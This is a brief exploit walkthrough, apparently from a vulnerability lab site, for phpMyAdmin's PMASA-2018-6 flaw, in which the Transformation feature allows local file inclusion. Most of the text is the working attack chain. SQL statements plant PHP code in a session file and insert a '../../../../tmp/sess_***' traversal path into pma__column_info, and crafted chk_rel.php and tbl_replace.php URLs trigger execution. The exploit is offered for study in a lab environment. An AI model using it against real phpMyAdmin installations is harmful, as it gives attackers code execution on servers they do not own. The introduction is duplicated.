On December 07, 2018, phpMyAdmin released a security bulletin PMASA-2018-6 to fix a local file reading vulnerability caused by the Transformation feature. The transformation feature from PHPMyAdmin allows to have a specific display for some columns when selecting them from a table. For example, it can transform links in text format to clickable links when rendering them.
On December 07, 2018, phpMyAdmin released a security bulletin PMASA-2018-6 to fix a local file reading vulnerability caused by the Transformation feature.
The transformation feature from PHPMyAdmin allows to have a specific display for some columns when selecting them from a table. For example, it can transform links in text format to clickable links when rendering them.
More about Transformations: Transformations - phpMyAdmin 5.0.0-dev documentation
VulnSpy's online phpMyAdmin 4.8.1 environment:https://www.vsplate.com/?github=vulnspy/phpmyadmin-4.8.1
VULNERABILITY DETAILS
PHPMyAdmin multiple vulnerabilities - Sec Team Blog
EXPLOIT
- Create a new database
foo
with a randombar
table containing abaz
column, with a data containing PHP code in it (to fill the session with some php code):
CREATE DATABASE foo;
CREATE TABLE foo.bar ( baz VARCHAR(100) PRIMARY KEY );
INSERT INTO foo.bar SELECT '<?php phpinfo(); ?>';
- Visit
http://pma.vsplate.me/chk_rel.php?fixall_pmadb=1&db=foo
to create phpmyadmin system tables in your db
- Fill the transformation information with the path traversal in the
pma__column_info
table:
Replace sess_*** to your sessionid (phpMyAdmin in cookies)
INSERT INTO `pma__column_info`SELECT '1', 'foo', 'bar', 'baz', 'plop',
'plop', 'plop', 'plop',
'../../../../../../../../tmp/sess_***','plop';
- Visit
http://pma.vsplate.me/tbl_replace.php?db=foo&table=bar&where_clause=1=1&fields_name[multi_edit][][]=baz&clause_is_unique=1
to trigger the vulnerability.